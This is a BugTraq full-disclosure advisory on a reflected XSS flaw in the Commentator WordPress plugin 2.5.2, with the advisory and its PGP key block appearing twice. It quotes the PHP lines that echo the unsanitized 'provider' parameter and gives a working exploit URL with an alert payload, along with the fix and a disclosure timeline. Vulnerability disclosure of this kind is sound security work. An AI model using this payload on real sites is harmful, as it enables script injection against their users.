BugTraq
Back to list
|
Post reply
Commentator Wordpress Plugin 2.5.2 XSS Vulnerability
Jan 13 2016 02:15PM
Rahul Pratap Singh (techno rps gmail com)
## Full Disclosure
#Product : Commentator Wordpress Plugin
#Exploit Author : Rahul Pratap Singh
#Version : 2.5.2
#Home page Link :
http://codecanyon.net/item/commentator-wordpress-plugin/6425752
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 13/Jan/2016
XSS Vulnerability:
----------------------------------------
Description:
----------------------------------------
"provider" parameter is not sanitized that leads to Reflected XSS.
----------------------------------------
Vulnerable Code:
----------------------------------------
file: commentator.php
line:441
$provider_name = $_REQUEST["provider"];
line:544
<div id="commentator-social-signin" class="commentator-<?php echo
$provider_name; ?>">
----------------------------------------
Exploit:
----------------------------------------
/wp-admin/admin-ajax.php?action=commentator_social_signin&provider=faceb
ook">%20<IMG%20SRC=axc%20onerror=alert(1)>
----------------------------------------
POC:
----------------------------------------
https://0x62626262.files.wordpress.com/2016/01/commentatorxsspoc.png
Fix:
Update to 2.5.3
Disclosure Timeline:
reported to vendor : 9/1/2016
vendor response : 11/1/2016
vendor acknowledged : 11/1/2016
vendor deployed a patch: 11/1/2016
Pub ref:
http://codecanyon.net/item/commentator-wordpress-plugin/6425752
https://0x62626262.wordpress.com/2016/01/13/commentator-wordpress-plugin
-xss-vulnerability
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v2.0.22 (GNU/Linux)
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
y0V0JgTl31Qj30kCJGsmmTu3IEQ=
=W24W
-----END PGP PUBLIC KEY BLOCK-----
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.22 (GNU/Linux)
iQIcBAEBAgAGBQJWllvkAAoJEJvdRneaz31ftnQP/jedj9aT8KREpOUDFV3FiUhm
bjbFX47xiyoWCSRgFXTvXKV+fnw1vCQC6IEliTbhSLl3IgQuTCOw+hGVg1bjVqlX
osu7F+NIDeKpC01h2JyrDYzhUpjbT3k9i2e2cl2JCXTmetMbVu/Y0QsZHHa5wofb
1A/vDKj6FbaKqnOhoRB7rMx9jLdoiG97ohHXbyYnGdDZKNTHASTF2j8Hp3CzGnWn
ARAJkKUUpUrmCMZD7q68+8IQ8NCcien4+bEm/L/tCmstDQ3SZn6XNBmVYCrKIe47
+UUCq5kNl+R90hUxrSIfjJiNbf6NHiLKkgaPm5c854CLUSMmAejaNUNdMVEE3RMl
iC38zCiDVkiD/T26ZH5IAqvZERzQ/Zuyt6C5OtlsVzqG2ftUwnZMA8fmao719czk
80XnrxKaH+SgAOfJBo/XMhCKR8SuDMgTyJVxUJpK9G4c+igk5c5u/xpIpfLeV8Sx
dKOMCJoCWZyd/AO4ZmJdmXWRKZHczcmOK+cYfICFPTGvwLIwRRG0cBdWR2yf+tAE
BoKxXITzIKguV9jeqJq7BNBkfryBbF+ggtIongsOpYWAHe8++HsQbIZZlSP4bNIR
8aVZDfPhNJ66KW5BXbQWLgvx1lTmpeCt2/yrK0b53n3XAZdFNGc7SAa/d2ZzdEbM
bF9fbzEgGucx1Gqp5Wb7
=ZtdM
-----END PGP SIGNATURE-----
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
#Product : Commentator Wordpress Plugin
#Exploit Author : Rahul Pratap Singh
#Version : 2.5.2
#Home page Link :
http://codecanyon.net/item/commentator-wordpress-plugin/6425752
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 13/Jan/2016
XSS Vulnerability:
----------------------------------------
Description:
----------------------------------------
"provider" parameter is not sanitized that leads to Reflected XSS.
----------------------------------------
Vulnerable Code:
----------------------------------------
file: commentator.php
line:441
$provider_name = $_REQUEST["provider"];
line:544
<div id="commentator-social-signin" class="commentator-<?php echo
$provider_name; ?>">
----------------------------------------
Exploit:
----------------------------------------
/wp-admin/admin-ajax.php?action=commentator_social_signin&provider=faceb
ook">%20<IMG%20SRC=axc%20onerror=alert(1)>
----------------------------------------
POC:
----------------------------------------
https://0x62626262.files.wordpress.com/2016/01/commentatorxsspoc.png
Fix:
Update to 2.5.3
Disclosure Timeline:
reported to vendor : 9/1/2016
vendor response : 11/1/2016
vendor acknowledged : 11/1/2016
vendor deployed a patch: 11/1/2016
Pub ref:
http://codecanyon.net/item/commentator-wordpress-plugin/6425752
https://0x62626262.wordpress.com/2016/01/13/commentator-wordpress-plugin
-xss-vulnerability
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v2.0.22 (GNU/Linux)
mQINBFYHqawBEAC3Mjyw1EiwhUNqaLqXqG2vTJMOwjqxwa3DAjPvO00BsytPB44L
QxGFx8tmkNcY/9D85cm6ZXfGzvMWVQqO47BTrRp2du3P+cXOtS+/MdM0ARy6dql8
Nlyuy4quuovD+1OOxVGU14Irl8WcmuwVY6eoYbVyRRNoSvo8gtUc4eGuDcIFS5KD
gnn2yGrU39oWe8s27Zqcuwmnt3P0qJrp6YhhDPrrm41v4akYSkAMAFnx5V+lgwJY
OrNBhSgvhPK4O9iHVER1YNPXQKWjOMkt+WRN4vbrzETSRiLt+v0vPPc7t6Ocp9td
if2NdShBiI54mZ+4iQQeLGCAopwCrcLcA5IBhT+XOXoQnXmQ0k5+CtunTrk2cB99
VDd+7d3bk/ajnMv2IVSPF9fPb6n0aSuoUu6hQ5Ig/SqorpRCsKXiaryb1UDPtrRE
/mvbAisqmbmQX8o3oMrQyRuDp4eHydWwFEUk+Rq42azBoTbE8o/3SjJ1G56mTDBr
i4Z8ZydrijPw01+2R++GfALvnguEptja7fAi10H3YYu3AqckcdcZig7Zu9Utp+Xj
kFGh8LVMJFd8YFBYXUp877tFJVhL4N3Nw0Q2zkAMEpAZTt7e9YVrqoxWLAnae+pT
wT3F0UMo+JkUhtYnHnTdGr5GDQGv4lJHkfF3MmFPPXlKyDQ+PUrOfD1bbQARAQAB
tClSYWh1bCBQcmF0YXAgU2luZ2ggPHRlY2huby5ycHNAZ21haWwuY29tPokCPgQT
AQIAKQUCVgeprAIbIwUJCWYBgAcLCQgHAwIBBhUIAgkKCwQWAgMBAh4BAheAAAoJ
EJvdRneaz31fDmsP+Lnr0/SS860E+VTP5GN8X6APuoFQI7iXlOg/8pvIKG1A9c02
1hBAN+5+sN3yRxo18rlHFPorszuR4eWrjXVo4TUlzjArHyTkDshg0bBiAtm3O4R0
CfwqC5Dp4/UuZ2GeX2duUob8SqpvkcAK/H+Ig88VDeR/vlDSIdq729KSB7aS6TyC
rohe79xPd03mvzOpBcmqQuQuV/6zCXjgn6yfOk9tf9dprDdM7jM+eimKdwXAAz1O
mebNXd6Q5SEOGq9SyESDAbKf6NtIrOIM7R1D9lNYF6PihZ4LyGLMzl7VN9ZbUcYj
p6IlQNn/K598CjubtFsc43Zt3Mw9uJJ/9f6+hVZBA1SwPQfMA9GbRfcBMt4Ufe8f
/CyqAhR1rzWFYoqfb42eA483cYSeFnChyXeUrddqNzXGVBSor+cNsxqkPyOlTu7B
ChBrb43Xh0HuxyA96mxEezgcMxFMc2OgPRdzqBo62HNKwlhBMLzkikVW9fd05IBA
c6fccQL25w12DXIwpJIHLlol8nTwy9FczyA3aVU2jHfvFPjILmg61AZi3VELpdtC
ydT52LwWhqRr/ctfX6W0pAzLHWBQapSuLjMk3TqtScU9XZaINHcXMXkCDAhZ/3mO
F15rKMj8ofSA253dMMzFaxID1Yq9j45o02+t2fp3bG0P4AOSR/pR4qalF5q5Ag0E
VgeprAEQAM+0XmpMNTDvq6ZY2Z86ejS5YeF6vKIaut35hzpNwjIpdBycRU9BlXZ8
U/b1+TAfQvr2JhGS69B5KAZuMQG0JvQRq+/AweoTlkWALYt1/mA5zI1PV1dIJxbv
oDGpOMrMuMmBNZSpb0AO88t6hzlLd1xTKbHmSvwr5DF29bzXD+KP1Gf72aSGQ/vb
mXncF2k0u32pxBRj9y4riQLix8L0754RSUKWNefuim44xIDhHFK5saLL4PAGoncV
JVAnY8oEEXMn+4RB2EocsUAU1PfFVUWGosoMmOyVnargpOJuaipmOgg5b5B5n82L
R0t85/k+9T1V3i5BMtnpdld+EpnB5Mbym4HQN7gD3Bjhm3JwgV9IxNxglYw/4LrY
WkgL+Q1Hp7C9N2DO9mfiQDHsbX0ZOWo9BPt8QDZpe0tLWZzo/wG9ZsgaSq2BWpQ7
fM8mDtqm2uRWWOgfskWSa8R9dBttXl7WnjfZkaiEQGCzOJhYcK4slDH8hVdeGuFn
UyqyYxvRbRgXiM0LhAKupqWlg9MZw1FLb46zicudDJmyEqZzxUBpjChiglus5VAW
32Bwnepd7Cjc/Hb+0YXp21HMU0z/bSYd9si7VfpKv3xq/qPDiJdN9VoPruHh6/66
JaJmAKU881oZW2+oY5QBXsS8F/oWxY1KheUABx74Ep+Xf2y6OYgPABEBAAGJAiUE
GAECAA8FAlYHqawCGwwFCQlmAYAACgkQm91Gd5rPfV+kIxAAisNgzb2wo4uQOrPh
eDY0WzqQjs/zKtwOh97jAypaXQLdMJ0TkZD2+tlxXlVUfjInJc/2ZEH+UPwEuTIp
zdvuNSsi/BiD9BxKQW6OY/aD/0s9giC5uwHcjPDVLqHVaRTiQxFUYwpRSMUrkv6P
n3KvQ/9gwN6x6ZiiTndRuNkhfKELzYRdyplqHtk7cUyNhxZsp4E/LJMSpBC7KTn8
LvNNl1vrzLCAdDUHqgOnW/Zc+wfDJDpDt0dJ52IJlxisZHF0riU7OvZYe7YwscO5
wLKj8kX/98hb0kj50QCQhmEiLsfL0fdRB8X+5WWyEW30zaoRFU3/Rrp5zzM821fS
cvWW0EUXyUEguqRFRPAY3WYYcLvdIzEJ/KSgbthGvjgncGp2PGhlT3XozS4rLUyo
sDmJZqkPpUXEmpvinBRDCsFvBmiUtihg5omgfJj5NYJHpvmnW3/9CjQzSOzmKpLo
z3WNEH26kSVNrB+fsDo7trXoaYTN6n7G1jll34Vj4DWFvURj4M3altdzF5kdVc6z
cbF4bSYrb+NO38zADSayDERzngUzouqlXbS8vJKQns+PE1ddwTZPbIen9lj+BPha
r53lQp7RucTZLVbCSeBrLXVpkvDCZDBF7Qx8KQY2BHYf4Xr0YHjuw4FMd2Fgkcdi
y0V0JgTl31Qj30kCJGsmmTu3IEQ=
=W24W
-----END PGP PUBLIC KEY BLOCK-----
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.22 (GNU/Linux)
iQIcBAEBAgAGBQJWllvkAAoJEJvdRneaz31ftnQP/jedj9aT8KREpOUDFV3FiUhm
bjbFX47xiyoWCSRgFXTvXKV+fnw1vCQC6IEliTbhSLl3IgQuTCOw+hGVg1bjVqlX
osu7F+NIDeKpC01h2JyrDYzhUpjbT3k9i2e2cl2JCXTmetMbVu/Y0QsZHHa5wofb
1A/vDKj6FbaKqnOhoRB7rMx9jLdoiG97ohHXbyYnGdDZKNTHASTF2j8Hp3CzGnWn
ARAJkKUUpUrmCMZD7q68+8IQ8NCcien4+bEm/L/tCmstDQ3SZn6XNBmVYCrKIe47
+UUCq5kNl+R90hUxrSIfjJiNbf6NHiLKkgaPm5c854CLUSMmAejaNUNdMVEE3RMl
iC38zCiDVkiD/T26ZH5IAqvZERzQ/Zuyt6C5OtlsVzqG2ftUwnZMA8fmao719czk
80XnrxKaH+SgAOfJBo/XMhCKR8SuDMgTyJVxUJpK9G4c+igk5c5u/xpIpfLeV8Sx
dKOMCJoCWZyd/AO4ZmJdmXWRKZHczcmOK+cYfICFPTGvwLIwRRG0cBdWR2yf+tAE
BoKxXITzIKguV9jeqJq7BNBkfryBbF+ggtIongsOpYWAHe8++HsQbIZZlSP4bNIR
8aVZDfPhNJ66KW5BXbQWLgvx1lTmpeCt2/yrK0b53n3XAZdFNGc7SAa/d2ZzdEbM
bF9fbzEgGucx1Gqp5Wb7
=ZtdM
-----END PGP SIGNATURE-----
[ reply ]